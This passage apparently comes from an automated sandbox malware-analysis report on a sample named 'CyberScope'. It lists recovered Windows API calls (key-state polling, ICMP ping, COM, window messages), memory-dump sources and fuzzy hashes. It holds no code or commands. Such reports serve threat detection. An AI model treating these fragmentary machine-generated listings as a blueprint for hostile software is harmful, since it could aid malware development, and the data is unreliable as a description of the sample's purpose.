                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 2762341140-0
                                                                                    • Opcode ID: a144b581c7b67cbb7aebf25c2da1dd460b0b5cdf588c9c70682c563c4737b361
                                                                                    • Instruction ID: 948dfbb9e2d430770ec5411e06d99a2ac32babcda63ae6805969b421e90d37b1
                                                                                    • Opcode Fuzzy Hash: a144b581c7b67cbb7aebf25c2da1dd460b0b5cdf588c9c70682c563c4737b361
                                                                                    • Instruction Fuzzy Hash: 69C11C75A00205EFDB14DFA4C888D9EBBF9FF48304B148599E559EB262DB30ED46CB90
                                                                                    APIs
                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001F039F
                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 001F03F8
                                                                                    • VariantInit.OLEAUT32(?), ref: 001F040A
                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 001F042A
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 001F047D
                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 001F0491
                                                                                    • VariantClear.OLEAUT32(?), ref: 001F04A6
                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 001F04B3
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001F04BC
                                                                                    • VariantClear.OLEAUT32(?), ref: 001F04CE
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001F04D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                    • String ID:
                                                                                    • API String ID: 2706829360-0
                                                                                    • Opcode ID: d51db88769b6b826d29c5c5735946ea940b0090c08bd2669bbce200b3aa7a568
                                                                                    • Instruction ID: 942a71991ea12ac33890f02d96149e1f6a666fedfd88132807a526663d812613
                                                                                    • Opcode Fuzzy Hash: d51db88769b6b826d29c5c5735946ea940b0090c08bd2669bbce200b3aa7a568
                                                                                    • Instruction Fuzzy Hash: D6414275A0021DEFCF15EF94D8489ED7BB9FF58344F008069EA55A7262C734A946CFA0
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 001FA65D
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 001FA6DE
                                                                                    • GetKeyState.USER32(000000A0), ref: 001FA6F9
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 001FA713
                                                                                    • GetKeyState.USER32(000000A1), ref: 001FA728
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 001FA740
                                                                                    • GetKeyState.USER32(00000011), ref: 001FA752
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 001FA76A
                                                                                    • GetKeyState.USER32(00000012), ref: 001FA77C
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 001FA794
                                                                                    • GetKeyState.USER32(0000005B), ref: 001FA7A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: d7de99e47846a843d3b37985155f52969b1d56681fd72d55a384f1fd171a5057
                                                                                    • Instruction ID: 4f935e4f4863afdf3b30272083cf701bbb1c5ceb1d9f89d1a6b45c393ca1eed8
                                                                                    • Opcode Fuzzy Hash: d7de99e47846a843d3b37985155f52969b1d56681fd72d55a384f1fd171a5057
                                                                                    • Instruction Fuzzy Hash: 3941C4F45047CD6DFF31A66088047B5BEB0AF11354F888159D7CA8A2C2EB9D99C8C7A3
                                                                                    APIs
                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00211019
                                                                                    • inet_addr.WSOCK32(?), ref: 00211079
                                                                                    • gethostbyname.WSOCK32(?), ref: 00211085
                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00211093
                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00211123
                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00211142
                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00211216
                                                                                    • WSACleanup.WSOCK32 ref: 0021121C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                    • String ID: Ping
                                                                                    • API String ID: 1028309954-2246546115
                                                                                    • Opcode ID: 4ee81f33cfc6be9105695ec7383d0f8598b8a6b015266a91c9048b23a6a48691
                                                                                    • Instruction ID: 9aec12dcaa6add90be6adb7541bed46f5fabf8fddf9a7734b94306389f52707f
                                                                                    • Opcode Fuzzy Hash: 4ee81f33cfc6be9105695ec7383d0f8598b8a6b015266a91c9048b23a6a48691
                                                                                    • Instruction Fuzzy Hash: 8991E231614202AFD720CF15D888F56BBE0FF58318F1485A9F6698B6A2C731EDA5CB81
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                    • API String ID: 707087890-567219261
                                                                                    • Opcode ID: 6ac4287177487e7a044091e1abfed47a952ca0fa85e1352a9142032d922c11ba
                                                                                    • Instruction ID: 295fdf30a4d8c29d7b0025b42697628333843b6b9f92f5e829ef179d8361058c
                                                                                    • Opcode Fuzzy Hash: 6ac4287177487e7a044091e1abfed47a952ca0fa85e1352a9142032d922c11ba
                                                                                    • Instruction Fuzzy Hash: C151B131A201179BCF14DFA8C9609FEB7E5AF35364B214229E866E7280D731DED1C790
                                                                                    APIs
                                                                                    • CoInitialize.OLE32 ref: 002141D1
                                                                                    • CoUninitialize.OLE32 ref: 002141DC
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00230B44,?), ref: 00214236
                                                                                    • IIDFromString.OLE32(?,?), ref: 002142A9
                                                                                    • VariantInit.OLEAUT32(?), ref: 00214341
                                                                                    • VariantClear.OLEAUT32(?), ref: 00214393
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                    • API String ID: 636576611-1287834457
                                                                                    • Opcode ID: 25beae7037a66bde5f09d2b63d5132689f2d64a0b55bb1960181c07376937874
                                                                                    • Instruction ID: ae3d9ef72b8ea113fef4af1ec1312a07cebc9288deead3c6b28aaac164bf89f4
                                                                                    • Opcode Fuzzy Hash: 25beae7037a66bde5f09d2b63d5132689f2d64a0b55bb1960181c07376937874
                                                                                    • Instruction Fuzzy Hash: 5B61B271618301AFD310EF64D888BAEBBE4EF59714F100549F9899B291C770ED95CB92
                                                                                    APIs
                                                                                    • GetLocalTime.KERNEL32(?), ref: 00208C9C
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00208CAC
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00208CB8
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00208D55
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00208D69
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00208D9B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00208DD1
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00208DDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1464919966-438819550
                                                                                    • Opcode ID: 74c4b41f82b169186ca3a983eb65a1f6dee0351591c84eecda960c9b3a83e7c9
                                                                                    • Instruction ID: 5b44519ccf9f7da26bfc200bd2dbc7848d1f4d358220098a9360db477a2f07f8
                                                                                    • Opcode Fuzzy Hash: 74c4b41f82b169186ca3a983eb65a1f6dee0351591c84eecda960c9b3a83e7c9
                                                                                    • Instruction Fuzzy Hash: AD615872514305AFDB14EF60C8449AFB3E8FF99314F04491EF98987292DB31E955CB92
                                                                                    APIs
                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001D39E2,00000004,00000000,00000000), ref: 001AFC41
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,001D39E2,00000004,00000000,00000000), ref: 001EFC15
                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001D39E2,00000004,00000000,00000000), ref: 001EFC98
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow
                                                                                    • String ID: (&
                                                                                    • API String ID: 1268545403-1801568203
                                                                                    • Opcode ID: 1880e483f2cd5e85d9e9d1fcdebca8f0781a753a838f0bcadfd9ad56cbd56c9c
                                                                                    • Instruction ID: e9e31a39fed1e0f44566ccad958e4142c617a37c92cbceaffc9a00d696453faf
                                                                                    • Opcode Fuzzy Hash: 1880e483f2cd5e85d9e9d1fcdebca8f0781a753a838f0bcadfd9ad56cbd56c9c
                                                                                    • Instruction Fuzzy Hash: 1F41F9346087C8AAC7388BBBD98CF297B91AB47330F35452CED46479A8C775A847C711
                                                                                    APIs
                                                                                    • CreateMenu.USER32 ref: 00224715
                                                                                    • SetMenu.USER32(?,00000000), ref: 00224724
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002247AC
                                                                                    • IsMenu.USER32(?), ref: 002247C0
                                                                                    • CreatePopupMenu.USER32 ref: 002247CA
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002247F7
                                                                                    • DrawMenuBar.USER32 ref: 002247FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                    • String ID: 0$F
                                                                                    • API String ID: 161812096-3044882817
                                                                                    • Opcode ID: 8220711aae729f124ef94f01d627332dcd766f88936f112360e6de9312cd8d8a
                                                                                    • Instruction ID: a448fc02260be6a77d898d1d4b7b26772ada9ad529e2470d6e6e8070ab863bfb
                                                                                    • Opcode Fuzzy Hash: 8220711aae729f124ef94f01d627332dcd766f88936f112360e6de9312cd8d8a
                                                                                    • Instruction Fuzzy Hash: 2641AE74A21216EFDF24DFA4E848EAA7BB5FF49314F144028FA4697350C7B0A925CF50
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                      • Part of subcall function 001F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 001F4620
                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 001F28B1
                                                                                    • GetDlgCtrlID.USER32 ref: 001F28BC
                                                                                    • GetParent.USER32 ref: 001F28D8
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001F28DB
                                                                                    • GetDlgCtrlID.USER32(?), ref: 001F28E4
                                                                                    • GetParent.USER32(?), ref: 001F28F8
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001F28FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 711023334-1403004172
                                                                                    • Opcode ID: 832e70e297e11e0475e3b039f44ebf912f47758fe78b8efc3cdff0ac6f6d3b58
                                                                                    • Instruction ID: 10a589996ac209a9c0bf16851afb205e41564242093e8def88272325ce99a9de
                                                                                    • Opcode Fuzzy Hash: 832e70e297e11e0475e3b039f44ebf912f47758fe78b8efc3cdff0ac6f6d3b58
                                                                                    • Instruction Fuzzy Hash: D121AC74900118BBCF14EBA0EC89DFEBBB9EF19354F400116FA61A32A1DB795919DB60
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                      • Part of subcall function 001F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 001F4620
                                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 001F2990
                                                                                    • GetDlgCtrlID.USER32 ref: 001F299B
                                                                                    • GetParent.USER32 ref: 001F29B7
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001F29BA
                                                                                    • GetDlgCtrlID.USER32(?), ref: 001F29C3
                                                                                    • GetParent.USER32(?), ref: 001F29D7
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001F29DA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 711023334-1403004172
                                                                                    • Opcode ID: 3f7aa2db8399cca1a17ce9fe72925c33e888a41a150da6f20c1137b2b19499b4
                                                                                    • Instruction ID: 1e63637a78589d49aaa46e13fdc8cd24b4b63064285bd29b0827d5459a370987
                                                                                    • Opcode Fuzzy Hash: 3f7aa2db8399cca1a17ce9fe72925c33e888a41a150da6f20c1137b2b19499b4
                                                                                    • Instruction Fuzzy Hash: BB21CF75D00118BBCF10ABA0EC89EFEBBB9FF15314F404016FA51A31A1CB795909DB60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00224539
                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0022453C
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00224563
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00224586
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002245FE
                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00224648
                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00224663
                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0022467E
                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00224692
                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 002246AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 312131281-0
                                                                                    • Opcode ID: 7a1beec206a355a31720501af3e0b065cd33424739db633c90cb7dbdcb8d13a5
                                                                                    • Instruction ID: 0a3733d086a861ded929b7bf5deee350d28d27a5f83cfa8d27eba36800756111
                                                                                    • Opcode Fuzzy Hash: 7a1beec206a355a31720501af3e0b065cd33424739db633c90cb7dbdcb8d13a5
                                                                                    • Instruction Fuzzy Hash: CF619A71A00219AFDB20DFA4DC81EFE77B8EF49300F104159FA04E72A1C7B4A969DB50
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001FBB18
                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001FABA8,?,00000001), ref: 001FBB2C
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 001FBB33
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001FABA8,?,00000001), ref: 001FBB42
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 001FBB54
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001FABA8,?,00000001), ref: 001FBB6D
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001FABA8,?,00000001), ref: 001FBB7F
                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001FABA8,?,00000001), ref: 001FBBC4
                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001FABA8,?,00000001), ref: 001FBBD9
                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001FABA8,?,00000001), ref: 001FBBE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                    • String ID:
                                                                                    • API String ID: 2156557900-0
                                                                                    • Opcode ID: 27232defa042e8f7be3b1e1e5f55845aec1a9a8142837c2b08849553c384ebeb
                                                                                    • Instruction ID: 2f3878a0d11c712b5f1c85f53c2ddf013c5b2ae2dd77ce34fb18990c9f5e93d4
                                                                                    • Opcode Fuzzy Hash: 27232defa042e8f7be3b1e1e5f55845aec1a9a8142837c2b08849553c384ebeb
                                                                                    • Instruction Fuzzy Hash: A4319E76908218BFDB24AB64FCCCF7A77A9EB49312F118015FB05D71A4D7B898418B60
                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002089F2
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00208A06
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00208A30
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00208A4A
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00208A5C
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00208AA5
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00208AF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                    • String ID: *.*
                                                                                    • API String ID: 769691225-438819550
                                                                                    • Opcode ID: 4f0715a680b4fa9ad8c209435adbc062ed066c960347a07e4c475651c10c4286
                                                                                    • Instruction ID: 77b5f57cd8a3e8b3f443b9fe561b53fc288590b7e06d983bd66ea346df8de529
                                                                                    • Opcode Fuzzy Hash: 4f0715a680b4fa9ad8c209435adbc062ed066c960347a07e4c475651c10c4286
                                                                                    • Instruction Fuzzy Hash: A681B0729243099BCB24EF54C484ABBB3E8BF94310F54482AF8C5D7292DF74D9558B92
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 00228992
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0022899E
                                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00228A79
                                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00228AAC
                                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 00228AE4
                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00228B06
                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00228B1E
                                                                                    Strings
                                                                                    Memory Dump Source
